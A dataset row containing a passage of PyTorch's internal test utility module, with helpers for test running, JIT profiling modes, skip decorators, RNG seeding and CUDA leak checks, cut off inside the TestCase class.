hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f70ff6e04f63c81719810ece2a44b944ddc360a2 | 68,978 | py | Python | torch/testing/_internal/common_utils.py | wenhaopeter/read_pytorch_code | 491f989cd918cf08874dd4f671fb7f0142a0bc4f | [
"Intel",
"X11"
] | null | null | null | torch/testing/_internal/common_utils.py | wenhaopeter/read_pytorch_code | 491f989cd918cf08874dd4f671fb7f0142a0bc4f | [
"Intel",
"X11"
] | null | null | null | torch/testing/_internal/common_utils.py | wenhaopeter/read_pytorch_code | 491f989cd918cf08874dd4f671fb7f0142a0bc4f | [
"Intel",
"X11"
] | null | null | null | r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
from functools import partial
import inspect
import io
import argparse
import unittest
import warnings
import random
import contextlib
import socket
import subprocess
import time
from collections import OrderedDict
from contextlib import contextmanager
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
from urllib.request import urlopen
import __main__
import errno
from typing import cast, Any, Iterable, Optional
from torch.testing._internal import expecttest
from torch.testing import _compare_tensors_internal, _compare_scalars_internal, _compare_return_type
import torch
import torch.cuda
from torch._utils_internal import get_writable_path
from torch._six import string_classes
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
from torch.autograd import gradcheck
from torch.autograd.gradcheck import gradgradcheck
torch.backends.disable_global_flags()
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
class ProfilingMode(Enum):
    # JIT graph-executor configuration, selected via --ge_config or inferred
    # from the current torch._C profiling flags (see
    # cppProfilingFlagsToProfilingMode below). Values are part of the
    # serialized test configuration; do not renumber.
    LEGACY = 1
    SIMPLE = 2
    PROFILING = 3
def cppProfilingFlagsToProfilingMode():
    """Infer the active ProfilingMode from the C++ JIT profiling flags.

    The flag setters are also the only way to read the flags: each one is
    set to True, its previous value captured, and then immediately restored.
    """
    prev_executor = torch._C._jit_set_profiling_executor(True)
    prev_mode = torch._C._jit_set_profiling_mode(True)
    torch._C._jit_set_profiling_executor(prev_executor)
    torch._C._jit_set_profiling_mode(prev_mode)
    if not prev_executor:
        return ProfilingMode.LEGACY
    return ProfilingMode.PROFILING if prev_mode else ProfilingMode.SIMPLE
@contextmanager
def enable_profiling_mode_for_profiling_tests():
    """Force the JIT profiling executor on for the with-block, but only when
    the suite runs under ProfilingMode.PROFILING; otherwise a no-op."""
    if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
        saved_executor = torch._C._jit_set_profiling_executor(True)
        saved_mode = torch._C._jit_set_profiling_mode(True)
    try:
        yield
    finally:
        # GRAPH_EXECUTOR is fixed at module load, so the guard matches the
        # one above and the saved_* names are bound whenever it is taken.
        if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
            torch._C._jit_set_profiling_executor(saved_executor)
            torch._C._jit_set_profiling_mode(saved_mode)
@contextmanager
def enable_profiling_mode():
    """Unconditionally enable the JIT profiling executor for the duration of
    the with-block, restoring the previous flag values on exit."""
    saved_executor = torch._C._jit_set_profiling_executor(True)
    saved_mode = torch._C._jit_set_profiling_mode(True)
    try:
        yield
    finally:
        torch._C._jit_set_profiling_executor(saved_executor)
        torch._C._jit_set_profiling_mode(saved_mode)
@contextmanager
def num_profiled_runs(num_runs):
    """Temporarily set the JIT's number of profiled runs to *num_runs*,
    restoring the previous value on exit."""
    previous = torch._C._jit_set_num_profiled_runs(num_runs)
    try:
        yield
    finally:
        torch._C._jit_set_num_profiled_runs(previous)
# Save the original ScriptFunction/ScriptMethod call slots so the profiling
# wrappers installed below can delegate to them.
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
    # Consume the test-only 'profile_and_replay' kwarg before forwarding.
    # Under the profiling executor the callable is deliberately invoked
    # twice: once to record profiling information and once more so the
    # returned result comes from the optimized (replayed) graph.
    if 'profile_and_replay' in kwargs:
        del kwargs['profile_and_replay']
        if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
            with enable_profiling_mode_for_profiling_tests():
                callable(*args, **kwargs)
                return callable(*args, **kwargs)
    return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
    # Replacement for ScriptFunction.__call__ (installed below).
    return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
    # Replacement for ScriptMethod.__call__ (installed below).
    return prof_callable(meth_call, *args, **kwargs)
# Monkey-patch the TorchScript call entry points process-wide so every
# scripted call made by the test suite routes through prof_callable.
torch._C.ScriptFunction.__call__ = prof_func_call
torch._C.ScriptMethod.__call__ = prof_meth_call
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
# Harness-level command-line flags. `add_help=False` plus parse_known_args
# lets these coexist with unittest's own flags; anything unrecognized is
# forwarded to unittest via UNITTEST_ARGS below.
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('--subprocess', action='store_true',
                    help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--ge_config', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
                    const=_get_test_report_path(),
                    default=_get_test_report_path() if bool(os.environ.get('IN_CIRCLECI')) else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
args, remaining = parser.parse_known_args()
# Select the JIT graph executor; an explicit --ge_config wins, otherwise the
# mode is read back from the C++ profiling flags.
if args.ge_config == 'legacy':
    GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.ge_config == 'profiling':
    GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.ge_config == 'simple':
    GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
    # infer flags based on the default settings
    GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
# Module-level knobs consumed by run_tests() and TestCase below.
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
# Don't clobber an ACCEPT already enabled through expecttest itself.
if not expecttest.ACCEPT:
    expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
def wait_for_process(p):
    """Wait for subprocess *p* to exit and return its exit code.

    On KeyboardInterrupt the child is given five seconds to handle the
    signal itself (without this, `pytest` can't print the errors it
    collected so far); if it is still alive after that it is killed and the
    exception propagates. Any other failure also kills the child before
    re-raising, and the `finally` clause always reaps the process.
    """
    try:
        return p.wait()
    except KeyboardInterrupt:
        try:
            # Give `p` a chance to handle KeyboardInterrupt. Without this,
            # `pytest` can't print errors it collected so far upon KeyboardInterrupt.
            return p.wait(timeout=5)
        except subprocess.TimeoutExpired:
            # Fix: Popen.wait(timeout=...) raises TimeoutExpired rather than
            # returning None, so the previous `exit_status is not None` check
            # could never reach its kill path and the trailing `finally`
            # p.wait() would then block forever on a hung child. Kill the
            # child before propagating.
            p.kill()
            raise
    except:  # noqa E722, copied from python core library
        p.kill()
        raise
    finally:
        # Always call p.wait() to ensure exit
        p.wait()
def shell(command, cwd=None, env=None):
    """Run *command* (a list/tuple of tokens) as a subprocess and return its
    exit code via wait_for_process.

    Modeled on the Py3 core library subprocess.call, with SIGINT handling
    (see wait_for_process) added:
    https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
    """
    # Flush our own streams first so parent/child output interleaves sanely.
    sys.stdout.flush()
    sys.stderr.flush()
    assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
    child = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
    return wait_for_process(child)
# Used to run the same test with different tensor types
def repeat_test_for_types(dtypes):
    """Decorator factory: run the wrapped test once per dtype in *dtypes*,
    passing each as a `dtype=` kwarg inside its own subTest."""
    def decorator(test_fn):
        @wraps(test_fn)
        def call_each_dtype(self, *args):
            for dtype in dtypes:
                with TestCase.subTest(self, dtype=dtype):
                    test_fn(self, *args, dtype=dtype)
        return call_each_dtype
    return decorator
# Environment variable `IS_PYTORCH_CI` is set in `.jenkins/common.sh`.
IS_PYTORCH_CI = bool(os.environ.get('IS_PYTORCH_CI'))
def discover_test_cases_recursively(suite_or_case):
    """Flatten a (possibly nested) unittest suite into a flat list of
    TestCase instances, preserving discovery order."""
    if isinstance(suite_or_case, unittest.TestCase):
        return [suite_or_case]
    cases = []
    for child in suite_or_case:
        cases.extend(discover_test_cases_recursively(child))
    return cases
def get_test_names(test_cases):
    """Return 'TestClass.test_method' identifiers for the given cases."""
    names = []
    for case in test_cases:
        parts = case.id().split('.')
        names.append('.'.join(parts[-2:]))
    return names
def chunk_list(lst, nchunks):
    """Split *lst* into *nchunks* round-robin (strided) sublists."""
    chunks = [[] for _ in range(nchunks)]
    for index, item in enumerate(lst):
        chunks[index % nchunks].append(item)
    return chunks
def run_tests(argv=UNITTEST_ARGS):
    """Main entry point for test files: dispatch on the harness flags parsed
    above (--discover-tests, --subprocess, --run-parallel, --save-xml,
    --repeat) and fall back to plain unittest.main()."""
    if TEST_DISCOVER:
        # --discover-tests: just print the test names, don't run anything.
        suite = unittest.TestLoader().loadTestsFromModule(__main__)
        test_cases = discover_test_cases_recursively(suite)
        for name in get_test_names(test_cases):
            print(name)
    elif TEST_IN_SUBPROCESS:
        # --subprocess: re-invoke this file once per test case for isolation.
        suite = unittest.TestLoader().loadTestsFromModule(__main__)
        test_cases = discover_test_cases_recursively(suite)
        failed_tests = []
        for case in test_cases:
            test_case_full_name = case.id().split('.', 1)[1]
            exitcode = shell([sys.executable] + argv + [test_case_full_name])
            if exitcode != 0:
                failed_tests.append(test_case_full_name)
        assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
            len(failed_tests), '\n\t'.join(failed_tests))
    elif RUN_PARALLEL > 1:
        # --run-parallel N: shard tests round-robin across N child processes.
        suite = unittest.TestLoader().loadTestsFromModule(__main__)
        test_cases = discover_test_cases_recursively(suite)
        test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
        processes = []
        for i in range(RUN_PARALLEL):
            command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
            processes.append(subprocess.Popen(command, universal_newlines=True))
        failed = False
        for p in processes:
            failed |= wait_for_process(p) != 0
        assert not failed, "Some test shards have failed"
    elif TEST_SAVE_XML is not None:
        # import here so that non-CI doesn't need xmlrunner installed
        import xmlrunner
        test_report_path = TEST_SAVE_XML + LOG_SUFFIX
        os.makedirs(test_report_path, exist_ok=True)
        verbose = '--verbose' in argv or '-v' in argv
        if verbose:
            print('Test results will be stored in {}'.format(test_report_path))
        unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
    elif REPEAT_COUNT > 1:
        # --repeat N: rerun the whole module, exiting on the first failure.
        for _ in range(REPEAT_COUNT):
            if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
                sys.exit(-1)
    else:
        unittest.main(argv=argv)
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
if IS_WINDOWS:
    @contextmanager
    def TemporaryFileName():
        # Context manager yielding the *name* of a temporary file that can be
        # re-opened by the code under test.
        # Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
        # opens the file, and it cannot be opened multiple times in Windows. To support Windows,
        # close the file after creation and try to remove it manually
        f = tempfile.NamedTemporaryFile(delete=False)
        try:
            f.close()
            yield f.name
        finally:
            os.unlink(f.name)
else:
    @contextmanager  # noqa: T484
    def TemporaryFileName():
        # POSIX allows reopening an open NamedTemporaryFile, so cleanup can
        # be delegated to the file object itself.
        with tempfile.NamedTemporaryFile() as f:
            yield f.name
def _check_module_exists(name):
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
import importlib
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
# Disables non-slow tests (these tests enabled by default)
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests. (I could have done an enum, but
# it felt a little awkward.
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
if TEST_NUMPY:
    import numpy as np
    # Dict of NumPy dtype -> torch dtype (when the correspondence exists)
    # NOTE: np.bool_ is used instead of the np.bool alias: the alias was
    # deprecated in NumPy 1.20 and removed in 1.24, where merely referencing
    # it raises AttributeError and would break this module at import time.
    # np.bool_ is also what `ndarray.dtype.type` reports, so it is the more
    # accurate lookup key.
    numpy_to_torch_dtype_dict = {
        np.bool_      : torch.bool,
        np.uint8      : torch.uint8,
        np.int8       : torch.int8,
        np.int16      : torch.int16,
        np.int32      : torch.int32,
        np.int64      : torch.int64,
        np.float16    : torch.float16,
        np.float32    : torch.float32,
        np.float64    : torch.float64,
        np.complex64  : torch.complex64,
        np.complex128 : torch.complex128
    }
    # Dict of torch dtype -> NumPy dtype (built before the alias below so
    # torch.bool maps to the canonical np.bool_).
    torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
    # Backward compatibility: on older NumPy, np.bool == builtin bool and
    # callers may still use it as a lookup key; keep it as an extra alias
    # without affecting the inverse mapping above.
    numpy_to_torch_dtype_dict.setdefault(bool, torch.bool)
ALL_TENSORTYPES = [torch.float,
torch.double,
torch.half]
# bfloat16 bringup is currently only available on ROCm
# ALL_TENSORTYPES2 will eventually be unified with ALL_TENSORTYPES
# when bfloat16 bringup is complete on all platforms
if TEST_WITH_ROCM:
ALL_TENSORTYPES2 = [torch.float,
torch.double,
torch.half,
torch.bfloat16]
else:
ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
    """Skip the decorated test when running on the ROCm stack."""
    @wraps(fn)
    def rocm_guard(*args, **kwargs):
        if TEST_WITH_ROCM:
            raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
        fn(*args, **kwargs)
    return rocm_guard
def skipIfCompiledWithoutNumpy(fn):
    """Skip the decorated test when PyTorch was built without NumPy support
    (USE_NUMPY=0), even if the numpy module itself is installed."""
    # Even if the numpy module is present, if `USE_NUMPY=0` is used during the
    # build, numpy tests will fail
    numpy_support = TEST_NUMPY
    if numpy_support:
        try:
            # The numpy module is present, verify that PyTorch is compiled with
            # numpy support
            torch.from_numpy(np.array([2, 2]))
        except RuntimeError:
            # from_numpy raises RuntimeError on builds without NumPy support.
            numpy_support = False
    @wraps(fn)
    def wrapper(*args, **kwargs):
        if not numpy_support:
            raise unittest.SkipTest("PyTorch was compiled without numpy support")
        else:
            fn(*args, **kwargs)
    return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
    """Skip the decorated test when torch was built without LAPACK support."""
    @wraps(fn)
    def lapack_guard(*args, **kwargs):
        if not torch._C.has_lapack:
            raise unittest.SkipTest('PyTorch compiled without Lapack')
        fn(*args, **kwargs)
    return lapack_guard
def skipIfNotRegistered(op_name, message):
    """Wraps the decorator to hide the import of the `core`.

    Args:
        op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
        message: message to fail with.

    Usage:
        @skipIfNotRegistered('MyOp', 'MyOp is not linked!')

    This will check if 'MyOp' is in the caffe2.python.core registry; when
    `caffe2.python.core` cannot be imported at all, the returned decorator
    skips unconditionally.
    """
    try:
        from caffe2.python import core
    except ImportError:
        return unittest.skip("Cannot import `caffe2.python.core`")
    return unittest.skipIf(op_name not in core._REGISTERED_OPERATORS, message)
def skipIfNoSciPy(fn):
    """Skip the decorated test when SciPy is not installed."""
    @wraps(fn)
    def scipy_guard(*args, **kwargs):
        if not TEST_SCIPY:
            raise unittest.SkipTest("test require SciPy, but SciPy not found")
        fn(*args, **kwargs)
    return scipy_guard
def slowTest(fn):
    """Mark a test as slow: it is skipped unless PYTORCH_TEST_WITH_SLOW=1."""
    @wraps(fn)
    def slow_guard(*args, **kwargs):
        if not TEST_WITH_SLOW:
            raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
        fn(*args, **kwargs)
    # Tag the wrapper so PYTORCH_TEST_SKIP_FAST handling can recognize it.
    slow_guard.__dict__['slow_test'] = True
    return slow_guard
def skipCUDAMemoryLeakCheckIf(condition):
    """Decorator factory: disable the CUDA memory-leak check on the
    decorated test when *condition* holds. A test that already set
    `_do_cuda_memory_leak_check = False` (an explicit opt-out) is left
    untouched."""
    def decorator(fn):
        currently_enabled = getattr(fn, '_do_cuda_memory_leak_check', True)
        if currently_enabled:
            fn._do_cuda_memory_leak_check = not condition
        return fn
    return decorator
def skipCUDANonDefaultStreamIf(condition):
    """Decorator factory: disable non-default-CUDA-stream enforcement on the
    decorated test when *condition* holds; an explicit opt-out
    (`_do_cuda_non_default_stream = False`) is left untouched."""
    def decorator(fn):
        currently_enabled = getattr(fn, '_do_cuda_non_default_stream', True)
        if currently_enabled:
            fn._do_cuda_non_default_stream = not condition
        return fn
    return decorator
def suppress_warnings(fn):
    """Decorator: execute *fn* with every warning filter set to "ignore".

    The wrapped function's return value is dropped, matching the other test
    decorators in this file.
    """
    @wraps(fn)
    def silenced(*args, **kwargs):
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            fn(*args, **kwargs)
    return silenced
def get_cpu_type(type_name):
    """Map a 'torch.cuda.X' tensor-type name to the corresponding torch.X
    CPU tensor type."""
    namespace, classname = type_name.rsplit('.', 1)
    assert namespace == 'torch.cuda'
    return getattr(torch, classname)
def get_gpu_type(type_name):
    """Map a CPU tensor type (class object or 'torch.X' name) to the
    corresponding torch.cuda.X tensor type."""
    if isinstance(type_name, type):
        type_name = '{}.{}'.format(type_name.__module__, type_name.__name__)
    namespace, classname = type_name.rsplit('.', 1)
    assert namespace == 'torch'
    return getattr(torch.cuda, classname)
def to_gpu(obj, type_map=None):
    """Recursively copy *obj* (tensor, storage, list, or tuple) to the GPU.

    type_map optionally overrides the CUDA type chosen per CPU tensor type;
    anything that is not a tensor/storage/list/tuple is deep-copied as-is.
    """
    if type_map is None:
        type_map = {}
    if isinstance(obj, torch.Tensor):
        # Only leaf tensors can be safely cloned with requires_grad carried over.
        assert obj.is_leaf
        t = type_map.get(obj.type(), get_gpu_type(obj.type()))
        with torch.no_grad():
            res = obj.clone().type(t)
            res.requires_grad = obj.requires_grad
        return res
    elif torch.is_storage(obj):
        return obj.new().resize_(obj.size()).copy_(obj)
    elif isinstance(obj, list):
        return [to_gpu(o, type_map) for o in obj]
    elif isinstance(obj, tuple):
        return tuple(to_gpu(o, type_map) for o in obj)
    else:
        return deepcopy(obj)
def get_function_arglist(func):
    """Return the named positional-argument names of *func*."""
    spec = inspect.getfullargspec(func)
    return spec.args
def set_rng_seed(seed):
    # Seed every RNG the tests rely on (torch, Python `random`, and NumPy
    # when available) so runs are reproducible.
    torch.manual_seed(seed)
    random.seed(seed)
    if TEST_NUMPY:
        np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
    """Context manager that restores the CPU (and, when available, CUDA) RNG
    state on exit, so random operations inside the block do not perturb
    subsequent randomness.

    Fix: restoration now happens in a ``finally`` clause, so the RNG state
    is restored even when the body raises.
    """
    rng_state = torch.get_rng_state()
    if torch.cuda.is_available():
        cuda_rng_state = torch.cuda.get_rng_state()
    try:
        yield
    finally:
        if torch.cuda.is_available():
            torch.cuda.set_rng_state(cuda_rng_state)
        torch.set_rng_state(rng_state)
@contextlib.contextmanager
def set_default_dtype(dtype):
    """Temporarily set torch's default dtype for the with-block.

    Fix: the previous dtype is now restored in a ``finally`` clause, so it
    is reinstated even when the body raises.
    """
    saved_dtype = torch.get_default_dtype()
    torch.set_default_dtype(dtype)
    try:
        yield
    finally:
        torch.set_default_dtype(saved_dtype)
def iter_indices(tensor):
    """Iterate over every index of *tensor*.

    0-d tensors yield nothing, 1-d tensors yield plain ints, and
    higher-rank tensors yield coordinate tuples (cartesian product over
    each dimension's extent).
    """
    rank = tensor.dim()
    if rank == 0:
        return range(0)
    if rank == 1:
        return range(tensor.size(0))
    return product(*(range(extent) for extent in tensor.size()))
def is_iterable(obj):
    """Return True when iter(obj) succeeds, False on TypeError (EAFP)."""
    try:
        iter(obj)
    except TypeError:
        return False
    return True
class CudaNonDefaultStream():
    """Context manager that switches every CUDA device to a fresh
    non-default stream for the duration of a test."""
    def __enter__(self):
        # Before starting CUDA test save currently active streams on all
        # CUDA devices and set new non default streams to all CUDA devices
        # to ensure CUDA tests do not use default stream by mistake.
        beforeDevice = torch.cuda.current_device()
        self.beforeStreams = []
        for d in range(torch.cuda.device_count()):
            self.beforeStreams.append(torch.cuda.current_stream(d))
            deviceStream = torch.cuda.Stream(device=d)
            torch._C._cuda_setStream(deviceStream._cdata)
        # Restore the originally-selected device after touching every device.
        torch._C._cuda_setDevice(beforeDevice)
    def __exit__(self, exec_type, exec_value, traceback):
        # After completing CUDA test load previously active streams on all
        # CUDA devices.
        beforeDevice = torch.cuda.current_device()
        for d in range(torch.cuda.device_count()):
            torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
        torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
    """Context manager asserting that CUDA memory allocated on each device
    is unchanged across the with-block (used to catch tensor leaks)."""
    def __init__(self, testcase, name=None):
        self.name = testcase.id() if name is None else name
        self.testcase = testcase
        # initialize context & RNG to prevent false positive detections
        # when the test is the first to initialize those
        from torch.testing._internal.common_cuda import initialize_cuda_context_rng
        initialize_cuda_context_rng()
    @staticmethod
    def get_cuda_memory_usage():
        # we don't need CUDA synchronize because the statistics are not tracked at
        # actual freeing, but at when marking the block as free.
        num_devices = torch.cuda.device_count()
        gc.collect()
        return tuple(torch.cuda.memory_allocated(i) for i in range(num_devices))
    def __enter__(self):
        # Snapshot per-device allocation counters at test start.
        self.befores = self.get_cuda_memory_usage()
    def __exit__(self, exec_type, exec_value, traceback):
        # Don't check for leaks if an exception was thrown
        if exec_type is not None:
            return
        afters = self.get_cuda_memory_usage()
        for i, (before, after) in enumerate(zip(self.befores, afters)):
            self.testcase.assertEqual(
                before, after, msg='{} leaked {} bytes CUDA memory on device {}'.format(
                    self.name, after - before, i))
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=100,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_PYTORCH_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE',
'dev')
)
except ImportError:
print('Fail to import hypothesis in common_utils, tests are not derandomized')
disabled_test_from_issues = None
def check_disabled(test_name):
global disabled_test_from_issues
if disabled_test_from_issues is None:
disabled_test_from_issues = {}
def read_and_process():
url = 'https://raw.githubusercontent.com/zdevito/pytorch_disabled_tests/master/result.json'
contents = urlopen(url, timeout=1).read().decode('utf-8')
the_response = json.loads(contents)
for item in the_response['items']:
title = item['title']
key = 'DISABLED '
if title.startswith(key):
test_name = title[len(key):].strip()
disabled_test_from_issues[test_name] = item['html_url']
if not IS_SANDCASTLE and os.getenv("PYTORCH_RUN_DISABLED_TESTS", "0") != "1":
try:
read_and_process()
except Exception:
print("Couldn't download test skip set, leaving all tests enabled...")
if test_name in disabled_test_from_issues:
raise unittest.SkipTest(
"Test is disabled because an issue exists disabling it: {}".format(disabled_test_from_issues[test_name]) +
" To enable set the environment variable PYTORCH_RUN_DISABLED_TESTS=1")
# Acquires the comparison dtype, required since isclose
# requires both inputs have the same dtype, and isclose is not supported
# for some device x dtype combinations.
# NOTE: Remaps bfloat16 to float32 since neither the CPU or CUDA device types
# support needed bfloat16 comparison methods.
# NOTE: Remaps float16 to float32 on CPU since the CPU device type doesn't
# support needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
    """Return the dtype tensors *a* and *b* should be converted to before
    comparison.

    bfloat16 is remapped to float32 before promotion (promote_types/isclose
    do not support it yet — TODO: revisit once they do), and a promoted
    float16 falls back to float32 unless both tensors live on the same CUDA
    device, since the CPU lacks the needed float16 comparison methods.
    """
    dtype_a = torch.float32 if a.dtype is torch.bfloat16 else a.dtype
    dtype_b = torch.float32 if b.dtype is torch.bfloat16 else b.dtype
    result = torch.promote_types(dtype_a, dtype_b)
    both_same_cuda = (a.device == b.device
                      and a.device.type == 'cuda'
                      and b.device.type == 'cuda')
    if result is torch.float16 and not both_same_cuda:
        # non-CUDA (CPU, for example) float16 -> float32
        result = torch.float32
    return result
class TestCase(expecttest.TestCase):
    """Base class for PyTorch test cases: adds a per-test precision (atol)
    override, CUDA memory-leak checking, non-default-CUDA-stream
    enforcement, sparse-tensor helpers, and NumPy comparison helpers on top
    of expecttest.TestCase."""
    # NOTE: "precision" lets classes and generated tests set minimum
    # atol values when comparing tensors. Used by @precisionOverride, for
    # example.
    # TODO: provide a better mechanism for generated tests to set rtol/atol.
    _precision: float = 0
    @property
    def precision(self) -> float:
        return self._precision
    @precision.setter
    def precision(self, prec: float) -> None:
        self._precision = prec
    # Per-class defaults; combined (ANDed) with per-test-method attributes
    # of the same name when the instance is constructed.
    _do_cuda_memory_leak_check = False
    _do_cuda_non_default_stream = False
    def __init__(self, method_name='runTest'):
        super().__init__(method_name)
        test_method = getattr(self, method_name, None)
        if test_method is not None:
            # Wraps the tested method if we should do CUDA memory check.
            self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
            # FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
            if self._do_cuda_memory_leak_check and not IS_WINDOWS:
                self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
            # Wraps the tested method if we should enforce non default CUDA stream.
            self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
            if self._do_cuda_non_default_stream and not IS_WINDOWS and not TEST_WITH_ROCM:
